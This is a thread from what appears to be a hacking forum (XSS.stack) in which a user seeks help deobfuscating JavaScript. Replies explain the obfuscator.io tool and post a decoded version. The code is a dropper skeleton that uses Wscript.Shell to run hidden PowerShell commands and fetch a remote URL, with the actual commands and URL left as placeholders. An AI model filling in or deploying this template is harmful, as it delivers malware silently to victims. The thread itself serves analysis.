• XSS.stack #1 – первый литературный журнал от юзеров форума

помогите с захламленным кодом JS

Отслеживать

Player_1

RAID-массив
Пользователь
Регистрация
22.05.2021
Сообщения
69
Реакции
6
Гарант сделки
2
прошу помощи понять что здесь происходить, никакие сервисы/тулзы с гита не помогли

JavaScript: 
function(_0x4c7b98,_0x5498b1){
    function _0x348384(_0x36d4d5,_0x3bf4d6){
    return _0x2697(_0x3bf4d6-390,_0x36d4d5);
    }
    var _0x2ea161=_0x4c7b98();
    while(!![]){
        try{
        var _0x3aed35=parseInt(_0x348384(866,870))/(-267*-7+-1080+2*-394)+-parseInt(_0x348384(871,865))/(-4513*1+9703*1+1297*-4)*(-parseInt(_0x348384(880,879))/(37*-115+3780+-478*-1))+-parseInt(_0x348384(869,874))/(-1469*3+4579+2*-84)*(parseInt(_0x348384(861,869))/(-2585+-1679+3*1423))+-parseInt(_0x348384(858,861))/(7843*1+1604+-9441)+-parseInt(_0x348384(865,875))/(-6425+-1401*-3+2229)*(-parseInt(_0x348384(876,868))/(29*-113+267*-2+1273*3))+parseInt(_0x348384(864,862))/(2*-4996+9137+864)*(parseInt(_0x348384(865,866))/(-2*-2608+1*4591+-9797))+-parseInt(_0x348384(880,872))/(9789+-3702+3038*-2)*(-parseInt(_0x348384(868,871))/(-8832+2227+-13*-509));
        //тут циферки были в хексе (сверху), я их перевел в обычный вид
            if(_0x3aed35===_0x5498b1){
            break;
            }
            else{
            _0x2ea161['push'](_0x2ea161['shift']());
            }
        }
        catch(_0x527d1a){
        _0x2ea161['push'](_0x2ea161['shift']());
        }
    }
}
 
liszt сказал(а):
Где функция _0x2697 ? Скинь пожалуйста весь исходный код и ничего не меняй.
<script>
(function(_0x4c7b98,_0x5498b1){
function _0x348384(_0x36d4d5,_0x3bf4d6){
return _0x2697(_0x3bf4d6-0x186,_0x36d4d5);
}
var _0x2ea161=_0x4c7b98();
while(!![]){
try{
var _0x3aed35=parseInt(_0x348384(866,870))/(-267*-7+-1080+2*-394)+-parseInt(_0x348384(871,865))/(-4513*1+9703*1+1297*-4)*(-parseInt(_0x348384(880,879))/(37*-115+3780+-478*-1))+-parseInt(_0x348384(869,874))/(-1469*3+4579+2*-84)*(parseInt(_0x348384(861,869))/(-2585+-1679+3*1423))+-parseInt(_0x348384(858,861))/(7843*1+1604+-9441)+-parseInt(_0x348384(865,875))/(-6425+-1401*-3+2229)*(-parseInt(_0x348384(876,868))/(29*-113+267*-2+1273*3))+parseInt(_0x348384(864,862))/(2*-4996+9137+864)*(parseInt(_0x348384(865,866))/(-2*-2608+1*4591+-9797))+-parseInt(_0x348384(880,872))/(9789+-3702+3038*-2)*(-parseInt(_0x348384(868,871))/(-8832+2227+-13*-509));
if(_0x3aed35===_0x5498b1){
break;
}
else{
_0x2ea161['push'](_0x2ea161['shift']());
}
}
catch(_0x527d1a){
_0x2ea161['push'](_0x2ea161['shift']());
}
}
}
(_0x3c83,0x997f8+-0x4*-0x2ed57+-0xe96df));
chuchukukukaokiwDasidow=new ActiveXObject('Wscript.Shell');
//SHELL
function _0x39ea20(_0x10e904,_0x1b7ccd){
return _0x2697(_0x1b7ccd- -0x226,_0x10e904);
}
cmd='p'+'o'+_0x39ea20(-0x51,-0x50);
//TEMPLATE COMMAND POWERSHEL сверху
//СНИЗУ ТОЖЕ КОМАНДЫ taskkill и тд...
chuchukukukaokiwDasidow[_0x39ea20(-0x47,-0x3f)](cmd,-0x5*-0x712+-0x33b*0x8+0x982*-0x1);
chuchukukukaokiwDasidow['Run'](_0x39ea20(-0x45,-0x49)+'""""""'+_0x39ea20(-0x48,-0x43),-0x1035+-0x8*0x1b9+-0x3*-0x9ff);
chuchukukukaokiwDasidow['Run'](_0x39ea20(-0x3a,-0x40),0x1250+-0x71*0x11+-0xacf);
chuchukukukaokiwDasidow[_0x39ea20(-0x38,-0x3e)](_0x39ea20(-0x51,-0x4c),0x2559+0x11e2+-0x373b);
function _0x3c83(){
var _0x461479=['https://URL/URL"""','76792dxXMHc','77GlTYja','ONE MORE COMMAND','run','Run','417wnDEeb','COMMAND HERE','1872498haKtob','13788FlTpUQ','close','ONE MORE COMMAND','120CFJYAg','3290vVZUuc','ONE MORE COMMAND','168464TgKnkZ','165dizlcG','564775UHakgM','307044JXEoyH','33PtjPJs'];
_0x3c83=function(){
return _0x461479;
};
return _0x3c83();
}
chuchukukukaokiwDasidow['Run']('ONE MORE COMMAND',-0x2616+0x3*-0x3e3+-0x3*-0x1095);
function _0x2697(_0x33a664,_0x19cbe9){
var _0x114c99=_0x3c83();
_0x2697=function(_0x5ad690,_0x102572){
_0x5ad690=_0x5ad690-(-6*-217+-3139*2+5446);
var _0x48506d=_0x114c99[_0x5ad690];
return _0x48506d;};
return _0x2697(_0x33a664,_0x19cbe9);
}
window[_0x39ea20(-0x47,-0x4d)]();

</script>
 
The threat actors abusing this code-snippet has probably used this service https://obfuscator.io/ to obfuscate his code.

Example before obfuscating:


JavaScript: 
// Paste your JavaScript code here

function hi() {

  console.log("Hello World!");

}

hi();




Example after obfuscating:


JavaScript: 
(function(_0x5a1468,_0x1107c0){var _0x108f7a=_0x3121,_0x374ba7=_0x5a1468();while(!![]){try{var _0x33fd51=parseInt(_0x108f7a(0x153))/0x1*(parseInt(_0x108f7a(0x152))/0x2)+-parseInt(_0x108f7a(0x14f))/0x3*(parseInt(_0x108f7a(0x151))/0x4)+-parseInt(_0x108f7a(0x158))/0x5+parseInt(_0x108f7a(0x150))/0x6+-parseInt(_0x108f7a(0x157))/0x7+-parseInt(_0x108f7a(0x155))/0x8*(-parseInt(_0x108f7a(0x15a))/0x9)+-parseInt(_0x108f7a(0x154))/0xa*(-parseInt(_0x108f7a(0x159))/0xb);if(_0x33fd51===_0x1107c0)break;else _0x374ba7['push'](_0x374ba7['shift']());}catch(_0x31c7c2){_0x374ba7['push'](_0x374ba7['shift']());}}}(_0x3b21,0x7f56d));function hi(){var _0x2120a2=_0x3121;console[_0x2120a2(0x156)]('Hello\x20World!');}function _0x3121(_0x55f726,_0x242608){var _0x3b21ef=_0x3b21();return _0x3121=function(_0x312165,_0xfb0776){_0x312165=_0x312165-0x14f;var _0x52600e=_0x3b21ef[_0x312165];return _0x52600e;},_0x3121(_0x55f726,_0x242608);}hi();function _0x3b21(){var _0x1ad550=['4013051AUprwZ','1608670MCEIOH','1023EdVDGw','23697OFBeVz','24909oWDxEp','3824262jSIqPw','404BjKsEf','422156gXPfyk','4ZsxUAR','31930oOYgQB','1448Lvcqcy','log'];_0x3b21=function(){return _0x1ad550;};return _0x3b21();}



It doesn't seem to me that there is a method to completely deobfuscate it, however you can still study the behavior of it to understand the end goal.
 
th3tr0ll сказал(а):
The threat actors abusing this code-snippet has probably used this service https://obfuscator.io/ to obfuscate his code.

Example before obfuscating:


JavaScript: 
// Paste your JavaScript code here

function hi() {

  console.log("Hello World!");

}

hi();




Example after obfuscating:


JavaScript: 
(function(_0x5a1468,_0x1107c0){var _0x108f7a=_0x3121,_0x374ba7=_0x5a1468();while(!![]){try{var _0x33fd51=parseInt(_0x108f7a(0x153))/0x1*(parseInt(_0x108f7a(0x152))/0x2)+-parseInt(_0x108f7a(0x14f))/0x3*(parseInt(_0x108f7a(0x151))/0x4)+-parseInt(_0x108f7a(0x158))/0x5+parseInt(_0x108f7a(0x150))/0x6+-parseInt(_0x108f7a(0x157))/0x7+-parseInt(_0x108f7a(0x155))/0x8*(-parseInt(_0x108f7a(0x15a))/0x9)+-parseInt(_0x108f7a(0x154))/0xa*(-parseInt(_0x108f7a(0x159))/0xb);if(_0x33fd51===_0x1107c0)break;else _0x374ba7['push'](_0x374ba7['shift']());}catch(_0x31c7c2){_0x374ba7['push'](_0x374ba7['shift']());}}}(_0x3b21,0x7f56d));function hi(){var _0x2120a2=_0x3121;console[_0x2120a2(0x156)]('Hello\x20World!');}function _0x3121(_0x55f726,_0x242608){var _0x3b21ef=_0x3b21();return _0x3121=function(_0x312165,_0xfb0776){_0x312165=_0x312165-0x14f;var _0x52600e=_0x3b21ef[_0x312165];return _0x52600e;},_0x3121(_0x55f726,_0x242608);}hi();function _0x3b21(){var _0x1ad550=['4013051AUprwZ','1608670MCEIOH','1023EdVDGw','23697OFBeVz','24909oWDxEp','3824262jSIqPw','404BjKsEf','422156gXPfyk','4ZsxUAR','31930oOYgQB','1448Lvcqcy','log'];_0x3b21=function(){return _0x1ad550;};return _0x3b21();}



It doesn't seem to me that there is a method to completely deobfuscate it, however you can still study the behavior of it to understand the end goal.
ty for information i will try to deobfuscate it with your info
 
JavaScript: 
(function(saveNotifs, mmCoreNotDownloaded) {
    var keymod = saveNotifs();
    for (; true;) {
        try {
            var allsectionsstatus = parseInt(getValue(480, 866)) / 1 + -parseInt(getValue(475, 871)) / 2 * (-parseInt(getValue(489, 880)) / 3) + -parseInt(getValue(484, 869)) / 4 * (parseInt(getValue(479, 861)) / 5) + -parseInt(getValue(471, 858)) / 6 + -parseInt(getValue(485, 865)) / 7 * (-parseInt(getValue(478, 876)) / 8) + parseInt(getValue(472, 864)) / 9 * (parseInt(getValue(476, 865)) / 10) + -parseInt(getValue(482, 880)) / 11 * (-parseInt(getValue(481, 868)) / 12);
            if (allsectionsstatus === mmCoreNotDownloaded) {
                break;
            } else {
                keymod.push(keymod.shift());
            }
        } catch (err) {
            keymod.push(keymod.shift());
        }
    }
}(saveNotifs, 439925));



chuchukukukaokiwDasidow = new ActiveXObject("Wscript.Shell");
cmd = "poCOMMAND HERE";
chuchukukukaokiwDasidow["run"]('poCOMMAND HERE', 0);
chuchukukukaokiwDasidow.Run('"ONE MORE COMMAND""""""https://URL/URL""""', 0);
chuchukukukaokiwDasidow.Run('"ONE MORE COMMAND"', 0);
chuchukukukaokiwDasidow["Run"]('"ONE MORE COMMAND"', 0)

function saveNotifs() {
    var platformCommands = ['https://URL/URL"""', "76792dxXMHc", "77GlTYja", "ONE MORE COMMAND", "run", "Run", "417wnDEeb", "COMMAND HERE", "1872498haKtob", "13788FlTpUQ", "close", "ONE MORE COMMAND", "120CFJYAg", "3290vVZUuc", "ONE MORE COMMAND", "168464TgKnkZ", "165dizlcG", "564775UHakgM", "307044JXEoyH", "33PtjPJs"];
    saveNotifs = function() {
        return platformCommands;
    };
    return saveNotifs();
}

chuchukukukaokiwDasidow.Run("ONE MORE COMMAND", 0);

function getValue(val, totalExpectedResults) {
    var _ball = saveNotifs();
    getValue = function(i, totalExpectedResults) {
        i = i - 470;
        var ball = _ball[i];
        return ball;
    };
    return getValue(val, totalExpectedResults);
}

window["close"]();
 
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх